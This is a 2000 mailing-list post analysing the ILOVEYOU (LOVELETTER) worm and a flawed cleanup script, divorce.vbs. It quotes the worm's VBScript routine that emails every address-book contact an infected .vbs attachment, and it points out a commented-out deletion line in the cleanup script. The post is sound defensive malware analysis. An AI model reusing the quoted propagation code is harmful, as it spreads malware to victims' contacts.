Vulnerability Development mailing list archives
Re: Opportunist?
From: des () FLOOD PING UIO NO (Dag-Erling Smorgrav)
Date: Fri, 5 May 2000 16:49:10 +0200
"GALES,SIMON (Non-A-ColSprings,ex1)" <george_gales () NON HP COM> writes:
I took a quick look at it, and was wondering just what it was doing fiddling in the MAPI address books... does the ILU worm write to the address book(s)?
No, but it loops through the address book and writes stuff to the registry for each entry in the address book. Here's the relevant excerpt from LOVELETTER (my indentation): for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next The corresponding code in divorce.vbs is supposed to remove those entries, but the crucial line is commented out. It looks like the authors just cut&pasted code from LOVELETTER and changed some words here and there to reverse the effect. Here's the relevant excerpt from divorce.vbs (authors' indentation): for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 if (int(a.AddressEntries.Count)>1) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (not regad="") then log_to_disk("Deleting HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) ! rem regedit.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead end if x=x+1 next end if next The line with a bang in the margin would remove the registry entries created by LOVELETTER, if it weren't commented out.
This script/batchfile only cleans up .vbs files, but I seem to remember someone mentioning overwritten .js/.mp3 files among others? Or is it just my end-of-week fogginess?
LOVELETTER deletes mp3 etc. files, and replaces them with .vbs files with the same name, so the offending files all end with .vbs. DES -- Dag-Erling Smorgrav - des () flood ping uio no
Current thread:
- Re: Opportunist? Dag-Erling Smorgrav (May 05)
- <Possible follow-ups>
- Re: Opportunist? GALES,SIMON (Non-A-ColSprings,ex1) (May 05)
- Re: Opportunist? Dag-Erling Smorgrav (May 05)
- Re: Opportunist? Dag-Erling Smorgrav (May 07)